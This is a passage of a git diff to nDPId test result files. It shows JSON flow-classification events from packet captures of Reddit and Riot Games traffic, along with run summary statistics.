{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","packets-captured":11682,"packets-processed":11682,"total-skipped-flows":0,"total-l4-payload-len":10573423,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":59,"total-detection-updates":84,"total-updates":0,"current-active-flows":0,"total-active-flows":60,"total-idle-flows":60,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":447,"global_ts_msec":1605291698785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 11682/11682 @@ -453,9 +453,9 @@ ~~ total active/idle flows...: 60/60 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6500321 bytes -~~ total memory freed........: 6500321 bytes -~~ total allocations/frees...: 130346/130346 +~~ total memory allocated....: 6633955 bytes +~~ total memory freed........: 6633955 bytes +~~ total allocations/frees...: 133108/133108 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1464 chars diff --git a/test/results/riotgames.pcap.out b/test/results/riotgames.pcap.out new file mode 100644 index 000000000..de8e94d8a --- /dev/null +++ b/test/results/riotgames.pcap.out @@ -0,0 +1,73 @@ +00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"riotgames.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1644446178115} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644446178115,"flow_last_seen":1644446178115,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1644446178115,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":59956,"dst_port":7194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1644446178115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1644446178115,"pkt":"eJS0JASgYDjgxTWgCABFAABREOUAAH8RfLDAqAJkovlIAeo0HBoAPXYrpJ+cMaAyQgQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644446178115,"flow_last_seen":1644446178115,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1644446178115,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":59956,"dst_port":7194,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1644446179143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1644446179143,"pkt":"eJS0JASgYDjgxTWgCABFAABREOYAAH8RfK\/AqAJkovlIAeo0HBoAPXYrpJ+cMaAyQgQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} +00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1644446180176,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1644446180176,"pkt":"eJS0JASgYDjgxTWgCABFAABREOcAAH8RfK7AqAJkovlIAeo0HBoAPXYrpJ+cMaAyQgQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmLme68LgEtiVPLEfLeojRgw="} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"riotgames.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":863,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1648063928092} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648063928092,"flow_last_seen":1648063928092,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1648063928092,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.179.216.242","src_port":48526,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648063928092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1648063928092,"pkt":"eJS0JASgYDjgxTWgCABFAAAkz4FAAD8R+pTAqAJk1bPY8r2Ow1QAECUCEzfK\/goAAAA="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648063928092,"flow_last_seen":1648063928092,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1648063928092,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.179.216.242","src_port":48526,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RiotGames","breed":"Acceptable","category":"Game"}} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648063928151,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1648063928151,"pkt":"YDjgxTWgeJS0JASgCABFAAAk5k1AADcR68jVs9jywKgCZMNUvY4AECUCEzfK\/goAAAAAAAAAAAAAAAAA"} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":18,"source":"riotgames.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1644446178115,"flow_last_seen":1644446183618,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1648063928151,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"162.249.72.1","src_port":59956,"dst_port":7194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 